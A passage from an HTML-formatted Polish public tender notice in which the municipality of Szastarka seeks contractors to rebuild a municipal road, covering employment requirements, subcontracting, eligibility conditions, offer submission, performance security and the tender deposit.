2004 roku Prawo zamówień publicznych (tj. Dz.U. z 2016 roku, poz. 831 z późn. zm.).W ramach udzielonej gwarancji Wykonawca zobowiązany jest zapewnić bezpłatne czynności przeglądów gwarancyjnych na cały przedmiot zamówienia, stąd też powinien związane z tym koszty uwzględnić w wynagrodzeniu ofertowym. Przeglądy będą odbywały się minimum raz w roku, chyba, że  gwarancja producenta danego materiału wymaga częstszych przeglądów gwarancyjnych.

3.11.Zamawiający na podstawie art. 29 ust.3a ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych (tj. Dz.U. z 2016 roku, poz. 831 z późn. zm.) wymaga zatrudnienia przez wykonawcę lub podwykonawcę na podstawie umowy o pracę osób wykonujących wskazane przez Zamawiającego czynności w zakresie realizacji zamówienia, jeżeli wykonanie tych czynności polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 roku Kodeks pracy (tj. Dz.U. z 2016 roku poz. 1666 z późn. zm.).3.12.Czynności występujące przy realizacji zamówienia w zakresie robót budowlanych, co do których Zamawiający wymaga zatrudnienia przez wykonawcę lub podwykonawcę osób na podstawie umowy o pracę:a)prace związane z odspajaniem, wydobywaniem, przemieszczeniem gruntów przy pomocy urządzeń mechanicznych (np. koparka, ładowarka, spycharka, równiarka), a w szczególności odkrycie krawędzi jezdni, zdjęcie humusu, odtwarzanie rowów przydrożnych, wykonanie poboczy gruntowych, wykonanie przez operatora urządzenia skierowanego do tych prac;b)prace związane z rozkładaniem i zagęszczeniem warstwy wiążącej i ścieralnej z mieszanek mineralno-bitumicznych, przy użyciu układarki i walca, wykonywanie przez operatorów właściwego sprzętu oraz przy współpracy robotników drogowych oddelegowanych do pracy przy układarce.c)prace związane z wykonaniem zjazdów, wykonaniem oznakowania poziomego, pionowego.Zamawiający nie wymaga zatrudnienia przez wykonawcę lub podwykonawcę na podstawie umowy o pracę osób wykonujących czynności związane z wykonaniem prac geodezyjnych, prac pomiarowych i prac zastrzeżonych dla kierownika budowy.3.13.Wykonawca w terminie 7 dni od zawarcia umowy przedłoży Zamawiającemu wykaz osób skierowanych do realizacji zamówienia wraz z przyporządkowaniem czynności opisanych w pkt III ppkt 3.12. jakie będą oni wykonywać wraz z oświadczeniem (zał. nr  7 do siwz), że osoby te zostały zatrudnione w ramach stosunku pracy w rozumieniu art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. - Kodeks pracy (Dz. U. z 2016 r. poz.1666 z późn. zm.).3.14.Zamawiający może wezwać wykonawcę do przedłużenia umów o pracę pozbawionych danych osobowych pracowników, za wyjątkiem danych identyfikacyjnych, celem weryfikacji zobowiązania wykonawcy/podwykonawcy odnośnie ilości osób zatrudnionych w ramach stosunku pracy, a wykonujących czynności na rzecz Zamawiającego oraz charakteru tych czynności i/lub dokumentów potwierdzających opłacanie składek na ubezpieczenia społeczne i zdrowotne z tytułu zatrudnienia na podstawie umów o pracę wraz z informacją o liczbie odprowadzonych składek, w postaci zaświadczenia ZUS lub dowodów potwierdzających zgłoszenie pracownika przez pracodawcę do ubezpieczeń pozbawionych danych osobowych, zgodnie z przepisami ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych. Zamawiający zastrzega sobie również możliwość przeprowadzenia kontroli w zakresie zatrudnienia na miejscu wykonania zadania.3.15.Z tytułu niespełnienia przez wykonawcę lub podwykonawcę wymogu zatrudnienia w ramach stosunku pracy osób wykonujących wskazane w pkt III ppkt 3.12. czynności, zamawiający przewiduje sankcję w postaci obowiązku zapłaty przez wykonawcę kary umownej w wysokości określonej w postanowieniach umowy w sprawie zamówienia publicznego. Niezłożenie przez wykonawcę w wyznaczonym przez zamawiającego terminie żądanych przez zamawiającego dowodów w celu potwierdzenia spełnienia przez wykonawcę lub podwykonawcę wymogu zatrudnienia w ramach stosunku pracy traktowane będzie jako niespełnienie przez wykonawcę lub podwykonawcę wymogu zatrudnienia osób w ramach stosunku pracy, wykonujących czynności wskazane w pkt III ppkt 3.12.3.16.W przypadku uzasadnionych wątpliwości, co do przestrzegania zasad prawa pracy przez wykonawcę lub podwykonawcę, zamawiający może zwrócić się o przeprowadzenie kontroli w tym zakresie przez Państwową Inspekcję Pracy.3.17.Dodatkowe wymagania stawiane Wykonawcy1.Zaleca się przeprowadzenie przez oferenta wizji lokalnej w terenie objętym niniejszym zamówieniem, celem sprawdzenia miejsca robót oraz warunków związanych z wykonaniem prac, wszelkich informacji będących przedmiotem zamówienia, które mogą być konieczne do prawidłowej wyceny wartości, gdyż wyklucza się możliwość dochodzenia od zamawiającego roszczeń związanych z błędnym skalkulowaniem ceny lub pominięciem elementów niezbędnych do prawidłowego wykonania umowy.2.Wykonawca w ramach ceny ofertowej zobowiązany jest zapewnić sprawowanie nadzoru autorskiego na czas trwania budowy.3.Zaplecze budowy wykonawca zorganizuje we własnym zakresie. Wykonawca zobowiązany będzie po zakończeniu robót przywrócić do stanu pierwotnego teren zaplecza budowy.
4.Wykonawca zrealizuje roboty będące przedmiotem umowy z materiałów własnych.5.Wykonawca wykona tablicę informacyjną i zamontuje ją w miejscu wykonywania robót, według wskazań Inspektora Nadzoru Inwestorskiego, a także będzie utrzymywał przedmiotową tablicę w dobrym stanie w czasie realizacji zadania. 3.18.Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy. 3.19.Wykonawca:a)jest zobowiązany wskazać w formularzu ofertowym (zał. nr 1 do siwz) części zamówienia, których wykonanie zamierza powierzyć podwykonawcom i podać firmy (oznaczenie przedsiębiorstwa) podwykonawców; brak powyższej informacji w ofercie oznaczać będzie, że Wykonawca nie będzie korzystał z podwykonawstwa przy realizacji zamówienia;b)w przypadku zawarcia umowy z zamawiającym będzie zobowiązany, przed przystąpieniem do wykonania zamówienia, podać - o ile są już znane - nazwy albo imiona i nazwiska oraz dane kontaktowe podwykonawców i osób do kontaktu z nimi, zaangażowanych w roboty budowlane. Wykonawca będzie zawiadamiał podczas realizacji umowy zamawiającego o wszelkich zmianach danych dotyczących podwykonawców, a także przekazywał informacje na temat nowych podwykonawców, którym w późniejszym okresie zamierza powierzyć realizację robót budowlanych lub usług. Wykonawca będzie zobowiązany zgłosić podwykonawców na zasadach określonych w przepisach art. 143b ustawy Prawo zamówień publicznych.3.20.Jeżeli późniejsza zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 22a ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych (tj. Dz.U. z 2016 roku, poz. 831 z późn. zm.), w celu wskazania spełnienia warunków udziału w postępowaniu Wykonawca jest zobowiązany wskazać Zamawiającemu, iż proponowany inny Podwykonawca lub Wykonawca samodzielnie spełniają je w stopniu nie mniejszym niż podwykonawca, na którego zasoby wykonawca powoływał się w trakcie postępowania o udzielenie zamówienia. Kary umowne za nieprawidłowe zgłaszanie podwykonawców oraz realizowanie na ich rzecz płatności określone są we wzorze umowy
<br /><br /><b>II.5) Główny kod CPV: </b>45233220-7<br /><b> Dodatkowe kody CPV:</b>71320000-7,
                45111000-8,
                45112710-5,
                45233320-8,
                45231300-8,
                45233292-2,
                45233290-8,
                45233221-4<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 29/09/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie dokonuje szczegółowego określenia w w/w warunku.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie dokonuje szczegółowego określenia w w/w warunku.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawca ubiegający się o udzielenie przedmiotowego zamówienia musi spełniać warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej.  Jako spełniający warunki udziału w postępowaniu zostaną ocenieni wykonawcy, którzy w zakresie warunku określonego w ppkt 2.3. wykażą wykonanie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia przez nich działalności jest krótszy - w tym okresie, minimum 1 (jednej) roboty budowlanej obejmującej swoim zakresem budowę, przebudowę drogi lub remont drogi o nawierzchni bitumicznej, klasy L lub wyższej, o wartości robót nie mniejszej niż  900.000 zł brutto, zrealizowaną w ramach jednego zadani(zamówienia, kontraktu, umowy) oraz wykażą wykonanie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia przez nich działalności jest krótszy  w tym okresie, co najmniej 1 (jednego) zadania polegającego na wykonaniu dokumentacji projektowej dotyczącej budowy, przebudowy lub remontu drogi o nawierzchni bitumicznej, klasy L lub wyższej, o długości minimum 1 km. Sprawdzenie w/w warunku udziału w postępowaniu odbywać się będzie na podstawie wykazu robót budowlanych stanowiącego zał. nr 4 do siwz  i dołączonych do niego dokumentów (referencji) potwierdzających, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Zamawiający działając na podstawie art. 26 ust. 2 ustawy odstępuje od żądania dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1 pkt 3 ustawy Pzp.</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />wykaz robót budowlanych, wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane oraz  w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wykonał  należycie, co najmniej 1  zadanie polegające na wykonaniu dokumentacji projektowej dotyczącej budowy lub przebudowy drogi o długości min 1 km,  z załączeniem dowodów określających czy te roboty budowlane oraz usługi zostały wykonane należycie, w szczególności informacji o tym czy roboty  i usługi zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane i usługi były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty - wg wzoru stanowiącego zał. nr 4 do siwz.<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">VI.10. Wykonawca,w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji z otwarcia ofert, o której mowa w art. 86 ust. 5 ustawy, samodzielnie (bez odrębnego wezwania ze strony Zamawiającego) przekaże zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej z innymi wykonawcami składającymi oferty w danym postępowaniu (tj. informację, o której mowa w art. 24 ust. 1 pkt 23) Pzp)  zał. nr 3 do siwz. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.11.Jeżeli	wykonawca nie złoży oświadczenia, o którym mowa w pkt VI.10. lub oświadczenie jest niekompletne, zawiera błędy lub budzi wskazane przez Zamawiającego wątpliwości, zamawiający wezwie do jego złożenia, uzupełnienia lub poprawienia lub do udzielania wyjaśnień w terminie przez siebie wskazanym, chyba że mimo ich złożenia, uzupełnienia lub poprawienia lub udzielenia wyjaśnień oferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. 1.Wykonawca wraz z ofertą składa oświadczenie wstępne potwierdzające spełnianie warunków udziału w postępowaniu oraz brak podstaw do wykluczenia z udziału w postępowaniu. Do oferty i oświadczenia wstępnego nie należy dołączać dokumentów wskazanych w pkt. V.10.  Dokumenty te składa się na wezwanie zamawiającego na zasadach określonych w przepisach art. 26 ustawy Prawo zamówień publicznych.2.Zamawiający przewiduje zastosowanie w trakcie postępowania procedurę wskazaną w art. 24aa Prawa zamówień publicznych tj. najpierw dokona oceny ofert, a następnie zbada, czy wykonawca, którego oferta została oceniona jako najkorzystniejsza, nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.3.Wzór oświadczenia wstępnego stanowi zał. nr 2 do siwz.4.W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie wstępne składa każdy wykonawca.5.Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania, w zakresie, w jakim powołuje się na ich zasoby zamieszcza informacje o tych podmiotach w oświadczeniu wstępnym.6.Zamawiający nie żąda, aby wykonawca, który zamierza powierzyć wykonanie części zamówienia podwykonawcom, w celu wykazania braku istnienia wobec nich podstaw wykluczenia z udziału w postępowaniu, zamieszczał informacje o podwykonawcach w oświadczeniu wstępnym. 3.	Pełnomocnictwo do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy, w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ustawy Prawo zamówień publicznych (dotyczy również wspólników spółki cywilnej). 5.4.Pełnomocnictwo do występowania w imieniu wykonawcy, w przypadku, gdydokumenty składające się na ofertę podpisuje osoba, której umocowanie do reprezentowania wykonawcy nie będzie wynikać z dokumentów załączonych do oferty.5.5.Wprzypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty i oświadczenia składające się na ofertę powinny być podpisane przez pełnomocnika.5.6.Pełnomocnictwo,	o którym mowa w pkt XI.5.3 i XI.5.4 powinno być przedstawione w formie oryginału lub kopii poświadczonej w drodze czynności notarialnej w rozumieniu ustawy z dnia 14 lutego 1991 roku Prawo o notariacie (Dz.U. z 2014 r.poz.164 z późn. zm).5.7.Poprawkipowinny być naniesione czytelnie oraz opatrzone podpisem/parafą osoby upoważnionej.5.8.Ponadto	zaleca się spięcie na trwałe wszystkich dokumentów, załączenie spisu treści oferty, ułożenie wszystkich wymaganych dokumentów zgodnie z kolejnością podaną w specyfikacji oraz ponumerowanie wszystkich stron oferty.5.9.W przypadku gdyby oferta, oświadczenia lub dokument}' zawierały informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, Wykonawca powinien w sposób niebudzący wątpliwości zastrzec, że nie mogą być one udostępnione oraz wykazywać, że zastrzeżone informacje stanowiące tajemnice przedsiębiorstwa. Informacje te powinny być umieszczone w osobnym wewnętrznym opakowaniu, trwale ze sobą połączone i ponumerowane. Nie mogą stanowić tajemnicy przedsiębiorstwa informacje podane do wiadomości podczas otwarcia ofert, tj. informacje dotyczące ceny, terminu wykonania zamówienia, okresu gwarancji i warunków płatności zawartych w ofercie.5.10.Ofertę wraz z oświadczeniami i dokumentami należy umieścić w zamkniętym opakowaniu, uniemożliwiającym odczytanie jego zawartości bez uszkodzenia tego opakowania. Opakowanie powinno zawierać następujące adnotacje: nazwa i  adresem Wykonawcy,   GMINA SZASTARKA, SZASTARKA 121, 23-225 SZASTARKA
OFERTA na zadanie pn.Przebudowa drogi gminnej nr 108619L Szastarka Stacja  Brzozówka-Kolonia  Nr sprawy ZP.271.II.4.17  z dopiskiem ,,Nie otwierać przed 27 lutego  2017 roku godz.09:15.5.11.Konsekwencje nieprawidłowego zaadresowania oferty będą obciążały wykonawcę (w tym konsekwencje zapoznania się z treścią oferty przed upływem terminu składania ofert w sytuacji, gdy na skutek braku oznaczenia koperty zostanie ona rozpieczętowana i pracownicy zamawiającego zapoznają się z jej treścią nie wiedząc o tym, że jest to ofert złożona w postępowaniu przetargowym).5.12.Przed upływem terminu składania ofert, Wykonawca może wprowadzić zmiany do złożonej oferty lub wycofać ofertę. Oświadczenia o wprowadzonych zmianach lub wycofaniu oferty powinny być doręczone Zamawiającemu na piśmie pod rygorem nieważności przed upływem terminu składania ofert. Oświadczenia powinny być opakowane tak, jak oferta, a opakowanie powinno zawierać odpowiednio dodatkowe oznaczenie wyrazem: ZMIANA" lub WYCOFANIE". XV.1.Wykonawca, którego oferta zostanie wybrana zobowiązany jest przed podpisaniem umowy: -wnieść zabezpieczenie należytego wykonania umowy.-przedłożyć uzgodniony z Zamawiającym harmonogram rzeczowo-finansowy realizacji zamówienia.2.Wykonawca, którego oferta zostanie wybrana zobowiązany jest podpisać umowę w miejscu wskazanym przez Zamawiającego, zgodną ze specyfikacją istotnych warunków zamówienia wraz z załącznikami oraz złożoną ofertą, w terminie wyznaczonym przez Zamawiającego. Osoby podpisujące umowę powinny posiadać ze sobą dokument potwierdzający ich umocowanie do podpisania umowy o ile umocowanie to nie będzie wynikać z dokumentów załączonych do oferty.
3.W przypadku wyboru oferty złożonej przez wykonawców wspólnie ubiegających się o udzielenie zamówienia zamawiający może żądać przed zawarciem umowy przedstawienia umowy regulującej współpracę tych wykonawców. Umowa taka winna określać strony umowy, cel działania, sposób współdziałania, zakres prac przewidzianych do wykonania każdemu z nich, solidarną odpowiedzialność za wykonanie zamówienia, oznaczenie czasu trwania konsorcjum (obejmującego okres realizacji przedmiotu zamówienia, gwarancji i rękojmi), wykluczenie możliwości wypowiedzenia umowy konsorcjum przez któregokolwiek z jego członków do czasu wykonania zamówienia.XVI. 1.	Zabezpieczenia należytego wykonania umowy w wysokości 10% ceny całkowitej brutto podanej w ofercie należy złożyć przed podpisaniem umowy w jednej z następujących postaci:pieniądzu;poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej; z tym, że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;gwarancjach bankowych;gwarancjach ubezpieczeniowych;poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. 2014 poz. 1804 z późń. zm.).2.Zabezpieczenie należytego wykonania umowy wnoszone przelewem należy wpłacać na konto Zamawiającego w Banku Spółdzielczym Ziemi Kraśnickiej Oddział  Szastarka nr konta  57 8717 1077 2007 7000 3971 0021 z dopiskiem: zabezpieczenie NWU Przebudowa drogi gminnej nr 108619L Szastarka Stacja  Brzozówka-Kolonia  3.Wprzypadku wnoszenia zabezpieczenia należytego wykonania umowy przelewem, za termin jego wniesienia przyjmuje się datę uznania rachunku Zamawiającego.4.Zabezpieczenie należytego wykonania umowy wniesione w formie poręczenia bankowego, poręczenia spółdzielczej kasy oszczędnościowo-kredytowej, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczenia udzielanego przez podmiot, o którym mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości będzie akceptowane pod warunkiem, że będzie zgodne z Prawem Zamówień Publicznych oraz zawieraną umową, a w szczególności:4.1.100% wartości zabezpieczenia należytego wykonania umowy będzie zawierało określony datą termin odpowiedzialności wykonawcy za niewykonanie lub nienależyte wykonanie zamówienia, nie krótszy niż termin obejmujący okres przewidziany umową na odbiór końcowy przedmiotu umowy i okres 30 dni po odbiorze.4.2.30% wartości zabezpieczenia należytego wykonania umowy pozostawione na zabezpieczenie roszczeń z tytułu rękojmi za wady będzie zawierało określony datą termin odpowiedzialności Wykonawcy z tytułu rękojmi za wady, nie krótszy niż okres rękojmi i obejmujący dodatkowy okres 15 dni.(Zamawiający przewiduje, że strony w umowie określą okres rękojmi za wady fizyczne równy okresowi udzielonej gwarancji. W przypadku zabezpieczenia należytego wykonania umowy, kwota 30% zabezpieczenia zostanie zatrzymana na okres udzielonej gwarancji równej okresowi rękojmi za wady fizyczne. Jeżeli okres, na jaki ma zostać wniesione zabezpieczenie przekracza 5 lat, zabezpieczenie w pieniądzu wniesione zostanie na cały ten okres, a zabezpieczenie w innej formie wniesione zostanie na okres nie krótszy niż 5 lat, z jednoczesnym zobowiązaniem się wykonawcy do przedłużenia zabezpieczenia lub wniesienia nowego zabezpieczenia na kolejne okresy. W przypadku nieprzedłużenia łub niewniesienia nowego zabezpieczenia najpóźniej na 30 dni przed upływem terminu ważności dotychczasowego zabezpieczenia wniesionego w innej formie niż w pieniądzu, zamawiający zmienia formę na zabezpieczenie w pieniądzu, poprzez wypłatę kwoty z dotychczasowego zabezpieczenia (co powinno być uwzględnione jako przesłanka wypłaty sumy gwarancyjnej w dokumencie gwarancyjnym) - wypłata ta powinna następować nie później niż w ostatnim dniu ważności dotychczasowego zabezpieczenia).5.W przypadku wniesienia zabezpieczenia należytego wykonania umowy w formie poręczenia bankowego, poręczenia spółdzielczej kasy oszczędnościowo-kredytowej, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczenia udzielanego przez podmiot, o którym mowa w art. 6b ust. 5 pkt.2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości, dokument zabezpieczenia należy złożyć w siedzibie zamawiającego, przed podpisaniem umowy. XVII. Wzór umowy stanowi zał. nr 5 do niniejszej specyfikacji istotnych warunków zamówienia. Przewidywane zmiany umowy zawarto we wzorze umowy stanowiącym integralną część siwz. XVIII. 1.Środki ochrony prawnej przysługują wykonawcy, a także innemu podmiotowi, jeżeli ma lub miał interes w uzyskaniu danego zamówienia oraz poniósł lub może ponieść szkodę w wyniku naruszenia przez zamawiającego przepisów niniejszej ustawy.2.Środki ochrony prawnej wobec ogłoszenia o zamówieniu oraz specyfikacji istotnych warunków zamówienia przysługują również organizacjom wpisanym na listę, o której mowa w art. 154 pkt 5 ustawy Prawo zamówień publicznych.3.Wykaz przysługujących środków ochrony prawnej, zasady ich wnoszenia oraz procedury związane z ich rozpatrzeniem określają przepisy  Działu VI  Środki ochrony prawnej ustawy Prawo zamówień publicznych
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />IX.1.Składający ofertę Wykonawca winien wnieść wadium przed upływem terminu składania ofert w wysokości:  25 000 zł (słownie: dwadzieścia pięć tysięcy złotych). 2.Wadium może być wnoszone w następujących formach: -pieniądzu,-poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z  tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;-gwarancjach bankowych,-gwarancjach ubezpieczeniowych;-poręczeniach udzielanych przez podmioty o których mowa w art. 6b ust.5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. 2014 poz. 1804 ze zm.)3.Wadium wnoszone w pieniądzu należy wpłacić przelewem na konto Zamawiającego: Bank Spółdzielczy Ziemi Kraśnickiej Oddział w  Szastarce nr konta 57 8717 1077 2007 7000 3971 0021   z dopiskiem Wadium ZP.271.II.4.17". Za termin wniesienia wadium przyjmuje się datę uznania rachunku Zamawiającego.4.W przypadku wniesienia wadium w formie gwarancji lub poręczenia dokument zabezpieczenia należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego - Gmina  Szastarka, (pokój nr 27 ),5.Wadium wniesione w formie gwarancji ubezpieczeniowej lub bankowej będzie akceptowane pod warunkiem, że jest zgodne z Prawem Zamówień Publicznych, a w szczególności 5.1.gwarancja będzie zawierała wszystkie przypadki utraty wadium przez wykonawcę określone w art. 46. ust. 4a i ust. 5 Prawa Zamówień Publicznych 5.2.okres ważności gwarancji będzie nie krótszy niż okres związania ofertą określony w Specyfikacji Istotnych Warunków Zamówienia 6.Wadium wniesione w formie poręczenia bankowego, poręczenia spółdzielczej kasy oszczędnościowo - kredytowej lub poręczenia udzielanego przez podmiot, o którym mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości będzie akceptowane pod warunkiem, że jest zgodne z Prawem Zamówień Publicznych, a w szczególności: 6.1.poręczenie będzie zawierało wszystkie przypadki utraty wadium przez wykonawcę określone w art. 46 ust. 4a i ust. 5 Prawa Zamówień Publicznych 6.2.poręczenie będzie zawierało określony datą termin odpowiedzialności, nie krótszy niż okres związania ofertą określony w Specyfikacji Istotnych Warunków Zamówienia. 7.Nie wniesienie wadium w terminie lub w sposób określony w siwz  spowoduje odrzucenie Wykonawcy na podstawie art. 89 ust 1 pkt. 7b ustawy Pzp. 8.Wadium musi zabezpieczać ofertę przez cały okres związania ofertą, począwszy od dnia, w którym upływa termin składania ofert.9.Zamawiający zwraca wadium zgodnie z zasadami określonymi w art. 46 ust 1-4 ustawy Pzp. 10.Zamawiającyzatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 i 3a, z przyczyn leżących po jego stronie, nie złożył oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1, oświadczenia, o którym mowa w art. 25a ust. 1, pełnomocnictw lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej (art. 46 ust. 4a ustawy Pzp).11.Zamawiający	zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:11.1.odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;11.2.nie wniósł wymaganego zabezpieczenia należytego wy konania umowy; 11.3.zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.(art. 46 ust. 5 ustawy Pzp)</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
